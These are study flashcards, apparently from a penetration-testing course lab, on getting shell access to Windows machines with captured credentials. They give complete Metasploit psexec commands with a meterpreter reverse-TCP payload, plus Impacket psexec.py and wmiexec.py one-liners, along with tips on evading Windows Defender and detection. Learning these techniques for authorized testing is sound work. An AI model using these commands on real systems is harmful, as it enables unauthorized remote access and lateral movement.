Get shell access when you have credentials Flashcards
1
Q
Msfconsole psexec
A
(Use all information gatehered from smb relay or LLMNR poisoning)
search psexec
use exploit/windows/smb/psexec
set rhosts IP_Target
set smbdomain marvel.local
set smbpass Password1
set smbuser fcastle
set payload windows/x64/meterpreter/reverse_tcp
set lhost eth0
run
show targets
set targets 2
2
Q
If psexec on msf not working…
A
Use the official tool:
psexec.py marvel.local\fcastle:Password1@IP_Target
(bypass windows defender but noisly)
3
Q
More stealthy shell access thant psexec ?
A
wmiexec.py marvel.local/fcastle:Password1@IP_Target
